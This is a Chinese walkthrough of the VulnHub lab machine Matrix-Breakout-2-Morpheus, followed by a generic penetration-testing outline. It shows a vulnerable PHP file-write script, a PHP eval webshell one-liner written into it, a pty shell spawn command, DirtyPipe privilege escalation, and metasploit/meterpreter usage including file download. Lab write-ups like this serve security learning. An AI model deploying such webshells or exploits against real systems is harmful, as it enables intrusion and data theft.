matrix-breakout-2-morpheus vulnhub靶场

端口扫描
在这里插入图片描述
80
在这里插入图片描述
81

需要用户名密码登录
在这里插入图片描述
目录扫描
在这里插入图片描述
robots.txt

妹用
在这里插入图片描述
找不到利用点,换个扫描器再扫

发现新的文件
在这里插入图片描述
graffiti.txt
在这里插入图片描述

graffiti.php
在这里插入图片描述
输入的数据Post后会回显到页面上
在这里插入图片描述
抓包看看,居然直接传文件路径
在这里插入图片描述
发现我们post的数据被写入了graffiti.txt文件

这里有可能存在文件任意读取漏洞,尝试修改file的值
在这里插入图片描述
发现可以读取graffiti.php文件
在这里插入图片描述
查看php内容

file默认值为graffifi.txt,接收file,message两个post参数

若存在message参数,则打开file文件并写入

<br>
$file="graffiti.txt";
<br>
if($_SERVER['REQUEST_METHOD'] == 'POST') {
<br>
    if (isset($_POST['file'])) {
<br>
       $file=$_POST['file'];
<br>
    }
<br>
    if (isset($_POST['message'])) {
<br>
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
<br>
        fwrite($handle, $_POST['message']);
<br>
	fwrite($handle, "\n");
<br>
        fclose($file); 
<br>
    }
<br>
}
<br>

<br>
// Display file
<br>
$handle = fopen($file,"r");
<br>
while (!feof($handle)) {
<br>
  echo fgets($handle);
<br>
  echo "<br>\n";
<br>
}
<br>
fclose($handle);

可以看出来通过修改file的值,可以实现文件任意写入

直接修改file为graffiti.php,message传入一句话木马,蚁剑连接

<?php @eval($_POST['cc']);?>

在这里插入图片描述
在这里插入图片描述
反弹shell
在这里插入图片描述
半交互回显

python3 -c 'import pty; pty.spawn("/bin/bash")' 

翻找文件时发现的
在这里插入图片描述
提权
上传linpeas.sh
好几个cve漏洞
在这里插入图片描述

从年份近的开始试起

CVE-2022-0847 DirtyPipe

添加链接描述

执行权限好像不够,直接加777
提权成功
在这里插入图片描述

Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值